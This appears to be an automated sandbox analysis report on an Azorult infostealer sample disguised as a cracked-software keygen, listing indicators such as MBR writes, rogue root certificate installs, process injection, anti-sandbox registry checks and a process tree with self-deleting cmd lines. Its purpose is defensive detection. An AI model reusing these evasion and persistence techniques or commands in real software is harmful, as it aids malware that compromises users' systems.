azorult | cbdca73f35a74084333ad849b15742bed455e5bfd4ce24edb202e71586c4d77f

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Setup.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	0DAB4E96D23C4CA2.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	0DAB4E96D23C4CA2.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	md2_2efs.exe

Enumerates connected drives 3 TTPs 48 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 8 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
35	api.ipify.org
96	ipinfo.io
98	ipinfo.io
105	ip-api.com
213	ipinfo.io
240	api.ipify.org
292	ipinfo.io
309	ipinfo.io

Writes to the Master Boot Record (MBR) 1 TTPs 3 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1067

description	ioc	Process
File opened for modification	\??\PhysicalDrive0	Setup.exe
File opened for modification	\??\PhysicalDrive0	0DAB4E96D23C4CA2.exe
File opened for modification	\??\PhysicalDrive0	0DAB4E96D23C4CA2.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
4356	Setup.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 4536 set thread context of 2700	4536	82A3.tmp.exe	92
PID 4920 set thread context of 4672	4920	0DAB4E96D23C4CA2.exe	108

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 11 IoCs

pid	pid_target	Process	procid_target
5688	3984	WerFault.exe	178
5912	3984	WerFault.exe	178
5984	3984	WerFault.exe	178
6056	3984	WerFault.exe	178
5608	3984	WerFault.exe	178
5828	3984	WerFault.exe	178
2720	3984	WerFault.exe	178
5848	3984	WerFault.exe	178
6080	3984	WerFault.exe	178
5876	3984	WerFault.exe	178
1128	1296	WerFault.exe	131

Checks SCSI registry key(s) 3 TTPs 12 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc	0DAB4E96D23C4CA2.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName	0DAB4E96D23C4CA2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000	0DAB4E96D23C4CA2.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc	0DAB4E96D23C4CA2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000	0DAB4E96D23C4CA2.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc	0DAB4E96D23C4CA2.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName	0DAB4E96D23C4CA2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000	0DAB4E96D23C4CA2.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc	0DAB4E96D23C4CA2.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName	0DAB4E96D23C4CA2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000	0DAB4E96D23C4CA2.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName	0DAB4E96D23C4CA2.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	82A3.tmp.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	82A3.tmp.exe

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

pid	Process
6632	schtasks.exe
5520	schtasks.exe

GoLang User-Agent 4 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

description	flow	ioc
HTTP User-Agent header	434	Go-http-client/1.1
HTTP User-Agent header	436	Go-http-client/1.1
HTTP User-Agent header	429	Go-http-client/1.1
HTTP User-Agent header	433	Go-http-client/1.1

Kills process with taskkill 4 IoCs

evasion

pid	Process
2776	taskkill.exe
5580	taskkill.exe
7008	TASKKILL.exe
7020	taskkill.exe

Modifies data under HKEY_USERS 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\PegasPc	file.exe

Modifies system certificate store 2 TTPs 4 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	file.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	file.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD	Setup.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD\Blob = 0300000001000000140000006c0ce2dd0584c47cac18839f14055f19fa270cdd2000000001000000500500003082054c30820434a0030201020206016de34cff62300d06092a864886f70d01010b05003081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a301e170d3030303130313030303030305a170d3438313231353039313533375a3081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a30820122300d06092a864886f70d01010105000382010f003082010a0282010100ae86c5043ed34d99f44fa3052ea34047a7fbbe33188b1dc2ca645ca3249e85e54b4921d4998fda6a22247c32d9087d742af3bf850803ae8c1e25faad53fb8fd823b7353d9a3ac992bf917f693826c790e53a540b120b6553508ec9585e467d310bd3ef9fb61731deb522eb78f43f824b34be36782db7a8cb162cd22247b14e4c5ae633ed66542354a59971bddc59160ecdc521b4477c93ca9e624e0af00298602300f5dc368819c3cb9f02604636888276b3a498570473b5328b0834f327c34285e333da9207e12f0edbb654c8cf11e3cc7cba17a52cd7cd42c10ae095a2e4eb9d3e3f361488243f0584af40e72d6e6e182149bfb8342384f60f12e14734258d0203010001a382017430820170300f0603551d130101ff040530030101ff3082012c06096086480186f842010d0482011d138201195468697320526f6f74206365727469666963617465207761732067656e65726174656420627920436861726c65732050726f787920666f722053534c2050726f7879696e672e20496620746869732063657274696669636174652069732070617274206f66206120636572746966696361746520636861696e2c2074686973206d65616e73207468617420796f752772652062726f7773696e67207468726f75676820436861726c65732050726f787920776974682053534c2050726f7879696e6720656e61626c656420666f72207468697320776562736974652e20506c656173652073656520687474703a2f2f636861726c657370726f78792e636f6d2f73736c20666f72206d6f726520696e666f726d6174696f6e2e300e0603551d0f0101ff040403020204301d0603551d0e04160414f8d0dc54367cf794020f8b92783a5d8a91251f9f300d06092a864886f70d01010b05000382010100662271eb9d5c744c88382de98ba37320e6312104d04273a92007a8670976d6530e6347d00bbded1319bb6754f36237596095922911e3661a70354f6ba0b797a76258be7adebb8c8dbeeed977760b80271d74b2444d92f6c1337a379b73545b251de5f8812b9625abbbfaedc15f8c6c374b9b26dd0fef035185f5899d8819e689dc6db5f0babbfd637c52b1bec80115b889faeed493d4112d744954ad3abe6607c41a4a2d657ba330ed131fa4e8c25bb28ee181dcef8da91c17bfd30a23c8eae81b152ed85ff938afc32b34ffdaffbdb72d9bb04067bfc87f579eba9637b165ea008ea7408bc8265f33c039bf60f506d245a6b53017afc8e161d70ed5b0d76576	Setup.exe

Runs .reg file with regedit 2 IoCs

pid	Process
7024	regedit.exe
964	regedit.exe

Runs ping.exe 1 TTPs 6 IoCs

Remote System Discovery

T1018

pid	Process
2180	PING.EXE
1956	PING.EXE
3852	PING.EXE
784	PING.EXE
5200	PING.EXE
6676	PING.EXE

Script User-Agent 5 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	97	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	101	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	212	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	291	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	308	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
2700	82A3.tmp.exe
2700	82A3.tmp.exe
1584	file.exe
1584	file.exe
1584	file.exe
1584	file.exe
1584	file.exe
1584	file.exe
1584	file.exe
1584	file.exe
2976	1614544911694.exe
2976	1614544911694.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1584	file.exe
Token: SeShutdownPrivilege	4540	msiexec.exe
Token: SeIncreaseQuotaPrivilege	4540	msiexec.exe
Token: SeSecurityPrivilege	4640	msiexec.exe
Token: SeCreateTokenPrivilege	4540	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	4540	msiexec.exe
Token: SeLockMemoryPrivilege	4540	msiexec.exe
Token: SeIncreaseQuotaPrivilege	4540	msiexec.exe
Token: SeMachineAccountPrivilege	4540	msiexec.exe
Token: SeTcbPrivilege	4540	msiexec.exe
Token: SeSecurityPrivilege	4540	msiexec.exe
Token: SeTakeOwnershipPrivilege	4540	msiexec.exe
Token: SeLoadDriverPrivilege	4540	msiexec.exe
Token: SeSystemProfilePrivilege	4540	msiexec.exe
Token: SeSystemtimePrivilege	4540	msiexec.exe
Token: SeProfSingleProcessPrivilege	4540	msiexec.exe
Token: SeIncBasePriorityPrivilege	4540	msiexec.exe
Token: SeCreatePagefilePrivilege	4540	msiexec.exe
Token: SeCreatePermanentPrivilege	4540	msiexec.exe
Token: SeBackupPrivilege	4540	msiexec.exe
Token: SeRestorePrivilege	4540	msiexec.exe
Token: SeShutdownPrivilege	4540	msiexec.exe
Token: SeDebugPrivilege	4540	msiexec.exe
Token: SeAuditPrivilege	4540	msiexec.exe
Token: SeSystemEnvironmentPrivilege	4540	msiexec.exe
Token: SeChangeNotifyPrivilege	4540	msiexec.exe
Token: SeRemoteShutdownPrivilege	4540	msiexec.exe
Token: SeUndockPrivilege	4540	msiexec.exe
Token: SeSyncAgentPrivilege	4540	msiexec.exe
Token: SeEnableDelegationPrivilege	4540	msiexec.exe
Token: SeManageVolumePrivilege	4540	msiexec.exe
Token: SeImpersonatePrivilege	4540	msiexec.exe
Token: SeCreateGlobalPrivilege	4540	msiexec.exe
Token: SeCreateTokenPrivilege	4540	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	4540	msiexec.exe
Token: SeLockMemoryPrivilege	4540	msiexec.exe
Token: SeIncreaseQuotaPrivilege	4540	msiexec.exe
Token: SeMachineAccountPrivilege	4540	msiexec.exe
Token: SeTcbPrivilege	4540	msiexec.exe
Token: SeSecurityPrivilege	4540	msiexec.exe
Token: SeTakeOwnershipPrivilege	4540	msiexec.exe
Token: SeLoadDriverPrivilege	4540	msiexec.exe
Token: SeSystemProfilePrivilege	4540	msiexec.exe
Token: SeSystemtimePrivilege	4540	msiexec.exe
Token: SeProfSingleProcessPrivilege	4540	msiexec.exe
Token: SeIncBasePriorityPrivilege	4540	msiexec.exe
Token: SeCreatePagefilePrivilege	4540	msiexec.exe
Token: SeCreatePermanentPrivilege	4540	msiexec.exe
Token: SeBackupPrivilege	4540	msiexec.exe
Token: SeRestorePrivilege	4540	msiexec.exe
Token: SeShutdownPrivilege	4540	msiexec.exe
Token: SeDebugPrivilege	4540	msiexec.exe
Token: SeAuditPrivilege	4540	msiexec.exe
Token: SeSystemEnvironmentPrivilege	4540	msiexec.exe
Token: SeChangeNotifyPrivilege	4540	msiexec.exe
Token: SeRemoteShutdownPrivilege	4540	msiexec.exe
Token: SeUndockPrivilege	4540	msiexec.exe
Token: SeSyncAgentPrivilege	4540	msiexec.exe
Token: SeEnableDelegationPrivilege	4540	msiexec.exe
Token: SeManageVolumePrivilege	4540	msiexec.exe
Token: SeImpersonatePrivilege	4540	msiexec.exe
Token: SeCreateGlobalPrivilege	4540	msiexec.exe
Token: SeCreateTokenPrivilege	4540	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	4540	msiexec.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
4540	msiexec.exe

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
4356	Setup.exe
4920	0DAB4E96D23C4CA2.exe
2464	0DAB4E96D23C4CA2.exe
4672	firefox.exe
2976	1614544911694.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4700 wrote to memory of 4076	4700	[CRACKHEAP.NET]PW12345NewLive_All_Media_Fixer_Pro_v6_keygen_by_FUTURiTY.exe	78
PID 4700 wrote to memory of 4076	4700	[CRACKHEAP.NET]PW12345NewLive_All_Media_Fixer_Pro_v6_keygen_by_FUTURiTY.exe	78
PID 4700 wrote to memory of 4076	4700	[CRACKHEAP.NET]PW12345NewLive_All_Media_Fixer_Pro_v6_keygen_by_FUTURiTY.exe	78
PID 4076 wrote to memory of 3280	4076	cmd.exe	81
PID 4076 wrote to memory of 3280	4076	cmd.exe	81
PID 4076 wrote to memory of 3280	4076	cmd.exe	81
PID 4076 wrote to memory of 496	4076	cmd.exe	82
PID 4076 wrote to memory of 496	4076	cmd.exe	82
PID 4076 wrote to memory of 496	4076	cmd.exe	82
PID 4076 wrote to memory of 648	4076	cmd.exe	83
PID 4076 wrote to memory of 648	4076	cmd.exe	83
PID 4076 wrote to memory of 648	4076	cmd.exe	83
PID 4076 wrote to memory of 972	4076	cmd.exe	84
PID 4076 wrote to memory of 972	4076	cmd.exe	84
PID 4076 wrote to memory of 972	4076	cmd.exe	84
PID 3280 wrote to memory of 4424	3280	keygen-pr.exe	85
PID 3280 wrote to memory of 4424	3280	keygen-pr.exe	85
PID 3280 wrote to memory of 4424	3280	keygen-pr.exe	85
PID 972 wrote to memory of 1584	972	keygen-step-4.exe	86
PID 972 wrote to memory of 1584	972	keygen-step-4.exe	86
PID 972 wrote to memory of 1584	972	keygen-step-4.exe	86
PID 4424 wrote to memory of 4528	4424	key.exe	87
PID 4424 wrote to memory of 4528	4424	key.exe	87
PID 4424 wrote to memory of 4528	4424	key.exe	87
PID 648 wrote to memory of 4476	648	keygen-step-3.exe	88
PID 648 wrote to memory of 4476	648	keygen-step-3.exe	88
PID 648 wrote to memory of 4476	648	keygen-step-3.exe	88
PID 4476 wrote to memory of 2180	4476	cmd.exe	90
PID 4476 wrote to memory of 2180	4476	cmd.exe	90
PID 4476 wrote to memory of 2180	4476	cmd.exe	90
PID 1584 wrote to memory of 4536	1584	file.exe	91
PID 1584 wrote to memory of 4536	1584	file.exe	91
PID 1584 wrote to memory of 4536	1584	file.exe	91
PID 4536 wrote to memory of 2700	4536	82A3.tmp.exe	92
PID 4536 wrote to memory of 2700	4536	82A3.tmp.exe	92
PID 4536 wrote to memory of 2700	4536	82A3.tmp.exe	92
PID 4536 wrote to memory of 2700	4536	82A3.tmp.exe	92
PID 4536 wrote to memory of 2700	4536	82A3.tmp.exe	92
PID 4536 wrote to memory of 2700	4536	82A3.tmp.exe	92
PID 4536 wrote to memory of 2700	4536	82A3.tmp.exe	92
PID 4536 wrote to memory of 2700	4536	82A3.tmp.exe	92
PID 4536 wrote to memory of 2700	4536	82A3.tmp.exe	92
PID 4536 wrote to memory of 2700	4536	82A3.tmp.exe	92
PID 4536 wrote to memory of 2700	4536	82A3.tmp.exe	92
PID 4536 wrote to memory of 2700	4536	82A3.tmp.exe	92
PID 4536 wrote to memory of 2700	4536	82A3.tmp.exe	92
PID 1584 wrote to memory of 200	1584	file.exe	94
PID 1584 wrote to memory of 200	1584	file.exe	94
PID 1584 wrote to memory of 200	1584	file.exe	94
PID 200 wrote to memory of 1956	200	cmd.exe	96
PID 200 wrote to memory of 1956	200	cmd.exe	96
PID 200 wrote to memory of 1956	200	cmd.exe	96
PID 972 wrote to memory of 4356	972	keygen-step-4.exe	95
PID 972 wrote to memory of 4356	972	keygen-step-4.exe	95
PID 972 wrote to memory of 4356	972	keygen-step-4.exe	95
PID 4356 wrote to memory of 4540	4356	Setup.exe	97
PID 4356 wrote to memory of 4540	4356	Setup.exe	97
PID 4356 wrote to memory of 4540	4356	Setup.exe	97
PID 4640 wrote to memory of 3148	4640	msiexec.exe	99
PID 4640 wrote to memory of 3148	4640	msiexec.exe	99
PID 4640 wrote to memory of 3148	4640	msiexec.exe	99
PID 4356 wrote to memory of 4920	4356	Setup.exe	100
PID 4356 wrote to memory of 4920	4356	Setup.exe	100
PID 4356 wrote to memory of 4920	4356	Setup.exe	100

C:\Users\Admin\AppData\Local\Temp\[CRACKHEAP.NET]PW12345NewLive_All_Media_Fixer_Pro_v6_keygen_by_FUTURiTY.exe
"C:\Users\Admin\AppData\Local\Temp\[CRACKHEAP.NET]PW12345NewLive_All_Media_Fixer_Pro_v6_keygen_by_FUTURiTY.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4700
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4076
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
    keygen-pr.exe -p83fsase3Ge
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:3280
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:4424
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
        5⤵
        
        PID:4528
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
    keygen-step-1.exe
    3⤵
    - Executes dropped EXE
    PID:496
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
    keygen-step-3.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:648
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4476
    - - C:\Windows\SysWOW64\PING.EXE
        
        ping 1.1.1.1 -n 1 -w 3000
        5⤵
        Runs ping.exe
        
        PID:2180
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
    keygen-step-4.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:972
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
      4⤵
      Executes dropped EXE
      Modifies data under HKEY_USERS
      Modifies system certificate store
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1584
    - - C:\Users\Admin\AppData\Roaming\82A3.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\82A3.tmp.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:4536
      - C:\Users\Admin\AppData\Roaming\82A3.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\82A3.tmp.exe"
        6⤵
        Executes dropped EXE
        Checks processor information in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:2700
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:200
      - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1
        6⤵
        Runs ping.exe
        
        PID:1956
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"
      4⤵
      Executes dropped EXE
      Checks whether UAC is enabled
      Writes to the Master Boot Record (MBR)
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Modifies system certificate store
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:4356
    - - C:\Windows\SysWOW64\msiexec.exe
        
        msiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"
        5⤵
        Enumerates connected drives
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:4540
    - - C:\Users\Admin\AppData\Local\Temp\0DAB4E96D23C4CA2.exe
        
        C:\Users\Admin\AppData\Local\Temp\0DAB4E96D23C4CA2.exe 0011 installp1
        5⤵
        Executes dropped EXE
        Checks whether UAC is enabled
        Writes to the Master Boot Record (MBR)
        Suspicious use of SetThreadContext
        Checks SCSI registry key(s)
        Suspicious use of SetWindowsHookEx
        
        PID:4920
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe"
        6⤵
        Suspicious use of SetWindowsHookEx
        
        PID:4672
      - C:\Users\Admin\AppData\Roaming\1614544911694.exe
        
        "C:\Users\Admin\AppData\Roaming\1614544911694.exe" /sjson "C:\Users\Admin\AppData\Roaming\1614544911694.txt"
        6⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:2976
      - C:\Users\Admin\AppData\Roaming\1614544917507.exe
        
        "C:\Users\Admin\AppData\Roaming\1614544917507.exe" /sjson "C:\Users\Admin\AppData\Roaming\1614544917507.txt"
        6⤵
        
        PID:3932
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe"
